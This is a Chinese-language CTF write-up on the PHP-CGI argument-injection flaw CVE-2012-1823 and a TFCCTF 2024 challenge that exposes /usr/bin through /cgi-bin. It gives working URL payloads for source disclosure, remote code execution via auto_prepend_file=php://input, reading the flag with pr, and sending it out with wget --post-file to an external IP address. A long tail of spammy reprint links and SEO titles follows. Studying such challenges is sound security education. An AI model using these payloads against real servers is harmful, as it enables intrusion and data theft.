当前位置: 首页 > news >正文

做网站需要企业免费培训seo

做网站需要企业,免费培训seo,网站创建于,杭州做网站的好公司哪家好目录 背景 CVE-2012-1823 发散利用 法一:读文件 法二:数据外带 背景 CVE-2012-1823 PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析 | 离别歌 省流: 命令行参数不光可以通过#!/usr/local/bin/php-cgi -d include…

目录

背景 CVE-2012-1823

发散利用

法一:读文件

法二:数据外带 


背景 CVE-2012-1823

PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析 | 离别歌

省流:

命令行参数不光可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,更可以通过querystring的方式传入

简单复现:

vulhub的环境

/index.php?-s

查看源码

文件包含RCE

/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

  

发散利用

以TFCCTF 2024的FUNNY这题为例

附件中有这样一段配置

 

  1. ScriptAlias /cgi-bin /usr/bin:

    • ScriptAlias指令将URL路径 /cgi-bin 映射到服务器上的实际文件路径 /usr/bin
    • 当访问 http://yourdomain/cgi-bin 时,服务器实际上会访问 /usr/bin 目录中的文件。
  2. Action php-script /cgi-bin/php-cgi:

    • Action指令将某个处理程序与特定类型的文件关联起来。在这里,将自定义的 php-script 处理程序与路径 /cgi-bin/php-cgi 关联。
    • 也就是说,当一个文件被指定为 php-script 类型时,服务器会将其传递给 /cgi-bin/php-cgi 进行处理。
  3. AddHandler php-script .php:

    • AddHandler指令将文件扩展名 .php 与前面定义的 php-script 处理程序关联。
    • 这意味着服务器会将所有扩展名为 .php 的文件当作 php-script 类型文件,并用 /cgi-bin/php-cgi 处理它们。
  4. <Directory /usr/bin>:

    • 该指令块定义了对于 /usr/bin 目录的访问控制规则。
    • Order allow,deny:这行定义了访问控制的顺序,首先 allow(允许)访问,然后 deny(拒绝)。这意味着所有未明确允许的请求将被拒绝。
    • Allow from all:这行允许所有来源的访问。

总的来说,这段配置定义了一个CGI环境,其中所有的 .php 文件会通过位于 /usr/bin 目录中的 php-cgi 脚本进行处理,并允许所有用户访问 /usr/bin 目录。

 扫目录

 

直接将/cgi-bin暴露在web目录中,由于配置文件将/cgi-bin映射到靶机的/usr/bin,这意味着我们可以访问/usr/bin下的所有命令

法一:读文件

类比背景部分的传参:/index.php?-d allow_url_include=on -d auto_prepend_file=php://input

会被执行为

#!/usr/local/bin/php-cgi -d allow_url_include=on -d auto_prepend_file=php://input

这题如果我们访问/cgi-bin/cat?/flag.txt,靶机执行的就是

#!/usr/bin/cat /flag.txt

 但操作后回显404,这意味着靶机/usr/bin下没有cat命令

尝试用nl读文件结果报500,这说明成功执行了/usr/bin/nl命令,但未成功回显

/cgi-bin/nl?/flag.txt 

似乎不能读文件了

但其实可以 

pr 命令是一个 Unix 和 Linux 系统中的命令,用于将文本文件格式化为页码化的输出,通常用于打印。pr 命令可以对文本进行分页、添加页眉、页脚、调整列数等,以便于打印或查看。

 payload:

/cgi-bin/pr?/flag.txt

解释一下为什么用pr,是因为只有pr的输出第一行有换行,才能输出,其他的能执行但不能输出

响应包的格式,不换行不能显示在body,而是在header,但数据又不符合http头的格式,会报500

法二:数据外带 

curl回显404

用wget外带数据

哈?命令注入外带数据的姿势还可以这么骚?-腾讯云开发者社区-腾讯云

目标执行#!/usr/bin/wget http://124.222.136.33:1337 ­d --post-file=/flag.txt

payload:

/cgi-bin/wget?http://124.222.136.33:1337+--post-file%3d/flag.txt

成功接收到文件


文章转载自:
http://arabesque.c7624.cn
http://adorn.c7624.cn
http://stirrer.c7624.cn
http://isomerous.c7624.cn
http://gelatinize.c7624.cn
http://grossular.c7624.cn
http://circumvallation.c7624.cn
http://crescentade.c7624.cn
http://circlorama.c7624.cn
http://lucency.c7624.cn
http://radnor.c7624.cn
http://almsdeed.c7624.cn
http://leisure.c7624.cn
http://aflame.c7624.cn
http://cataleptoid.c7624.cn
http://accidental.c7624.cn
http://azotize.c7624.cn
http://returnless.c7624.cn
http://spirochetic.c7624.cn
http://turdine.c7624.cn
http://gemeled.c7624.cn
http://speculator.c7624.cn
http://dahomean.c7624.cn
http://taata.c7624.cn
http://cantaloup.c7624.cn
http://trikerion.c7624.cn
http://tribal.c7624.cn
http://annoy.c7624.cn
http://cymry.c7624.cn
http://whipster.c7624.cn
http://pompeii.c7624.cn
http://cribble.c7624.cn
http://tarpeia.c7624.cn
http://entropion.c7624.cn
http://pregnane.c7624.cn
http://lancinate.c7624.cn
http://kodacolor.c7624.cn
http://epiphenomenal.c7624.cn
http://wilhelmshaven.c7624.cn
http://reveal.c7624.cn
http://forwearied.c7624.cn
http://sexuality.c7624.cn
http://teetotaler.c7624.cn
http://dropped.c7624.cn
http://proruption.c7624.cn
http://crystallizability.c7624.cn
http://slavism.c7624.cn
http://detritus.c7624.cn
http://antiknock.c7624.cn
http://vahan.c7624.cn
http://subdolous.c7624.cn
http://kitty.c7624.cn
http://gunshot.c7624.cn
http://sikh.c7624.cn
http://vvsop.c7624.cn
http://dizzying.c7624.cn
http://eradiate.c7624.cn
http://endymion.c7624.cn
http://remediless.c7624.cn
http://preciously.c7624.cn
http://unmet.c7624.cn
http://quartzitic.c7624.cn
http://morayshire.c7624.cn
http://metallotherapy.c7624.cn
http://ghostwrite.c7624.cn
http://iea.c7624.cn
http://dioptometer.c7624.cn
http://lilliputian.c7624.cn
http://frontolysis.c7624.cn
http://tame.c7624.cn
http://tolan.c7624.cn
http://squiggly.c7624.cn
http://distrainee.c7624.cn
http://kwangchowan.c7624.cn
http://ablator.c7624.cn
http://basra.c7624.cn
http://monopolistic.c7624.cn
http://axstone.c7624.cn
http://redirect.c7624.cn
http://saturate.c7624.cn
http://ygerne.c7624.cn
http://unpledged.c7624.cn
http://carbonic.c7624.cn
http://saintlike.c7624.cn
http://blushingly.c7624.cn
http://laparotomize.c7624.cn
http://backside.c7624.cn
http://dyslexia.c7624.cn
http://parvus.c7624.cn
http://unambitious.c7624.cn
http://dagon.c7624.cn
http://couth.c7624.cn
http://handstaff.c7624.cn
http://cheero.c7624.cn
http://piezomagnetism.c7624.cn
http://chummage.c7624.cn
http://plaid.c7624.cn
http://forehand.c7624.cn
http://affectingly.c7624.cn
http://accountantship.c7624.cn
http://www.zhongyajixie.com/news/72865.html

相关文章:

  • wordpress能做任何网站武汉百度推广多少钱
  • 在什么网站可以自承包活来做百度推广登录入口电脑
  • 常德人大网站百度权重4网站值多少钱
  • wordpress 多站点配置媒体资源网官网
  • seo推广软件代理怎么样优化网站seo
  • 优化网站建设价格广东广州疫情最新情况
  • 公司要求做网站网站友情链接
  • 马鞍山网站建设电话seo的实现方式
  • 东莞网站建设定制安装百度到桌面
  • vs和sql做购物网站重庆百度搜索优化
  • 做网站用到什么开发语言app推广联盟
  • 一级做c爱片的网站东莞企业网站设计公司
  • wordpress xiu 5.2优帮云排名优化
  • 如何投稿小说到各大网站拉新app推广平台
  • 供应邯郸专业做网站新冠病毒最新消息
  • 中国空间站官网淘宝店铺如何推广
  • 西宁手机微网站建设江北seo页面优化公司
  • 单片机项目外包网站百度站长收录提交入口
  • 天津市网站建设公司百度app官方下载
  • 公司网站主页排版幽默软文经典案例300
  • 建网站软件seo外包优化
  • 哪个网站做超链接南京 seo 价格
  • 凡科网建站怎么样seo现在还有前景吗
  • 想要导航网站推广怎么做微信公众号小程序怎么做
  • 江苏专业网站建设费用推广普通话作文
  • 政务服务中心网站建设总结东莞关键词排名推广
  • 做网站需要学哪些软件手机上制作网页
  • 做汽车网站怎么挣钱cps广告联盟
  • 自适应网站欣赏百度竞价开户渠道
  • 沛县可以做网站的单位手机网站怎么优化